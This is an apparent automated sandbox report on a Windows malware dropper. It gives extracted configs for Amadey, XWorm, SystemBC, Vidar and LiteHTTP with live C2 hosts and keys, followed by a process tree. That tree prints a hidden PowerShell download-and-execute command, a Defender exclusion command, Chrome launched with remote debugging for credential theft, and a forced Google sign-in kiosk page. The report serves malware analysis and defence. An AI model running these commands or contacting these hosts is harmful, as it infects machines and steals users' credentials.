Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    05/03/2025, 22:58

General

  • Target

    f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe

  • Size

    1.8MB

  • MD5

    457a48e9c0a205ea619dd5d5b4c2a6c3

  • SHA1

    15b8560577817747c13dc391d973ad2e26901315

  • SHA256

    f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e

  • SHA512

    ce53209091c4e22937bf82bd55e219347d4d3a5c339db8b5605ee4753edc2dbe292c40a3da7d736908c27f5c99636fd3c06ab4c81254366d89801cf3d9037e5a

  • SSDEEP

    49152:9p5faVoBzpIR5RtIfI9oljVRy3FgX1KL4Bc:T5goVpIRTtIA9AjhX1q4B

Malware Config

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

xworm

Version

5.0

C2

45.154.98.175:6969

Mutex

uGmGtmYAbzOi1F41

Attributes
  • Install_directory

    %AppData%

  • install_file

    google_updates.exe

aes.plain

Extracted

Family

systembc

C2

towerbingobongoboom.com

62.60.226.86

Attributes
  • dns

    5.132.191.104

Extracted

Family

vidar

Botnet

ir7am

C2

https://t.me/l793oy

https://steamcommunity.com/profiles/76561199829660832

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Extracted

Family

litehttp

Version

v1.0.9

C2

http://185.208.156.162/page.php

Attributes
  • key

    v1d6kd29g85cm8jp4pv8tvflvg303gbl

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 6 IoCs
  • Detect Xworm Payload 3 IoCs
  • Detects Healer an antivirus disabler dropper 2 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • LiteHTTP

    LiteHTTP is an open-source bot written in C#.

  • Litehttp family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

  • Systembc family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 13 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file 21 IoCs
  • Uses browser remote debugging 2 TTPs 4 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 26 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 30 IoCs
  • Identifies Wine through registry keys 2 TTPs 13 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Windows directory 3 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 9 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 35 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 44 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of FindShellTrayWindow 50 IoCs
  • Suspicious use of SendNotifyMessage 13 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe
    "C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:2948
    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2780
      • C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe
        "C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe"
        3⤵
        • Drops startup file
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        PID:2356
      • C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe
        "C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:1796
        • C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
          "C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
          4⤵
          • Downloads MZ/PE file
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:108
          • C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
            "C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:1604
      • C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe
        "C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2232
      • C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe
        "C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        PID:2804
      • C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe
        "C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1396
        • C:\Users\Admin\AppData\Local\Temp\onefile_1396_133856891568764000\chromium.exe
          C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:2640
      • C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
        "C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:852
        • C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe
          "C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          PID:2752
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
            5⤵
            • Uses browser remote debugging
            • Enumerates system info in registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            PID:880
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6f69758,0x7fef6f69768,0x7fef6f69778
              6⤵
                PID:2716
              • C:\Windows\system32\ctfmon.exe
                ctfmon.exe
                6⤵
                  PID:2680
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1160 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:2
                  6⤵
                    PID:1916
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1508 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:8
                    6⤵
                      PID:2268
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1572 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:8
                      6⤵
                        PID:900
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2224 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:1
                        6⤵
                        • Uses browser remote debugging
                        PID:956
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2256 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:1
                        6⤵
                        • Uses browser remote debugging
                        PID:3028
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1944 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:2
                        6⤵
                          PID:3052
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1336 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:1
                          6⤵
                          • Uses browser remote debugging
                          PID:948
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3416 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:8
                          6⤵
                            PID:536
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3528 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:8
                            6⤵
                              PID:2972
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3740 --field-trial-handle=1376,i,7487762965322507259,14912296919046212898,131072 /prefetch:8
                              6⤵
                                PID:276
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\2nop8" & exit
                              5⤵
                              • System Location Discovery: System Language Discovery
                              PID:3016
                              • C:\Windows\SysWOW64\timeout.exe
                                timeout /t 11
                                6⤵
                                • System Location Discovery: System Language Discovery
                                • Delays execution with timeout.exe
                                PID:2316
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 852 -s 500
                            4⤵
                            • Loads dropped DLL
                            • Program crash
                            PID:2068
                        • C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe
                          "C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe"
                          3⤵
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2172
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\QanWmXjd\Anubis.exe""
                            4⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2976
                        • C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe
                          "C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of SetThreadContext
                          • System Location Discovery: System Language Discovery
                          PID:1548
                          • C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe
                            "C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe"
                            4⤵
                            • Executes dropped EXE
                            PID:2080
                          • C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe
                            "C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe"
                            4⤵
                            • Executes dropped EXE
                            PID:2424
                          • C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe
                            "C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe"
                            4⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:1748
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1748 -s 1028
                              5⤵
                              • Loads dropped DLL
                              • Program crash
                              PID:1700
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 520
                            4⤵
                            • Loads dropped DLL
                            • Program crash
                            PID:1324
                        • C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe
                          "C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe"
                          3⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          PID:2244
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 1188
                            4⤵
                            • Loads dropped DLL
                            • Program crash
                            PID:1656
                        • C:\Users\Admin\AppData\Local\Temp\10107640101\PcAIvJ0.exe
                          "C:\Users\Admin\AppData\Local\Temp\10107640101\PcAIvJ0.exe"
                          3⤵
                          • Executes dropped EXE
                          PID:236
                          • C:\Windows\system32\cmd.exe
                            "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F90E.tmp\F90F.tmp\F910.bat C:\Users\Admin\AppData\Local\Temp\10107640101\PcAIvJ0.exe"
                            4⤵
                              PID:2352
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
                                5⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2480
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
                                  6⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3008
                          • C:\Users\Admin\AppData\Local\Temp\10107650101\zY9sqWs.exe
                            "C:\Users\Admin\AppData\Local\Temp\10107650101\zY9sqWs.exe"
                            3⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:1600
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 1052
                              4⤵
                              • Loads dropped DLL
                              • Program crash
                              PID:3020
                          • C:\Users\Admin\AppData\Local\Temp\10107660101\238042026f.exe
                            "C:\Users\Admin\AppData\Local\Temp\10107660101\238042026f.exe"
                            3⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:1796
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1796 -s 1220
                              4⤵
                              • Loads dropped DLL
                              • Program crash
                              PID:3008
                          • C:\Users\Admin\AppData\Local\Temp\10107670101\5e1228cb96.exe
                            "C:\Users\Admin\AppData\Local\Temp\10107670101\5e1228cb96.exe"
                            3⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious use of SetThreadContext
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:2636
                            • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                              "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                              4⤵
                              • Downloads MZ/PE file
                              • System Location Discovery: System Language Discovery
                              PID:1056
                          • C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe
                            "C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe"
                            3⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of SetThreadContext
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1440
                            • C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe
                              "C:\Users\Admin\AppData\Local\Temp\10107680101\4694e79003.exe"
                              4⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              PID:2408
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2408 -s 1020
                                5⤵
                                • Loads dropped DLL
                                • Program crash
                                PID:2340
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1440 -s 512
                              4⤵
                              • Loads dropped DLL
                              • Program crash
                              PID:1048
                          • C:\Users\Admin\AppData\Local\Temp\10107690101\7157e9ad9d.exe
                            "C:\Users\Admin\AppData\Local\Temp\10107690101\7157e9ad9d.exe"
                            3⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious use of SetThreadContext
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:1796
                            • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                              "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                              4⤵
                              • Downloads MZ/PE file
                              • System Location Discovery: System Language Discovery
                              PID:2796
                          • C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe
                            "C:\Users\Admin\AppData\Local\Temp\10107700101\0bb0c58326.exe"
                            3⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:2408
                          • C:\Users\Admin\AppData\Local\Temp\10107710101\a2d999341a.exe
                            "C:\Users\Admin\AppData\Local\Temp\10107710101\a2d999341a.exe"
                            3⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:2208
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 1200
                              4⤵
                              • Program crash
                              PID:2564
                          • C:\Users\Admin\AppData\Local\Temp\10107720101\2b862aa467.exe
                            "C:\Users\Admin\AppData\Local\Temp\10107720101\2b862aa467.exe"
                            3⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:1656
                          • C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe
                            "C:\Users\Admin\AppData\Local\Temp\10107730101\8a07a872cb.exe"
                            3⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SendNotifyMessage
                            PID:1244
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /F /IM firefox.exe /T
                              4⤵
                              • System Location Discovery: System Language Discovery
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2216
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /F /IM chrome.exe /T
                              4⤵
                              • System Location Discovery: System Language Discovery
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1236
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /F /IM msedge.exe /T
                              4⤵
                              • System Location Discovery: System Language Discovery
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1372
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /F /IM opera.exe /T
                              4⤵
                              • System Location Discovery: System Language Discovery
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2572
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /F /IM brave.exe /T
                              4⤵
                              • System Location Discovery: System Language Discovery
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2224
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                              4⤵
                                PID:2672
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                  5⤵
                                  • Checks processor information in registry
                                  • Modifies registry class
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of FindShellTrayWindow
                                  • Suspicious use of SendNotifyMessage
                                  PID:948
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="948.0.1296375672\1433213446" -parentBuildID 20221007134813 -prefsHandle 1132 -prefMapHandle 1124 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f483df3f-b1a4-4423-b49d-69e0062c0cc8} 948 "\\.\pipe\gecko-crash-server-pipe.948" 1316 101f0158 gpu
                                    6⤵
                                      PID:1960
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="948.1.256581804\1545010702" -parentBuildID 20221007134813 -prefsHandle 1552 -prefMapHandle 1548 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b5e4eda8-9824-4bfb-9ea5-043b9bf01f7c} 948 "\\.\pipe\gecko-crash-server-pipe.948" 1564 43eb558 socket
                                      6⤵
                                        PID:988
                                      • C:\Program Files\Mozilla Firefox\firefox.exe
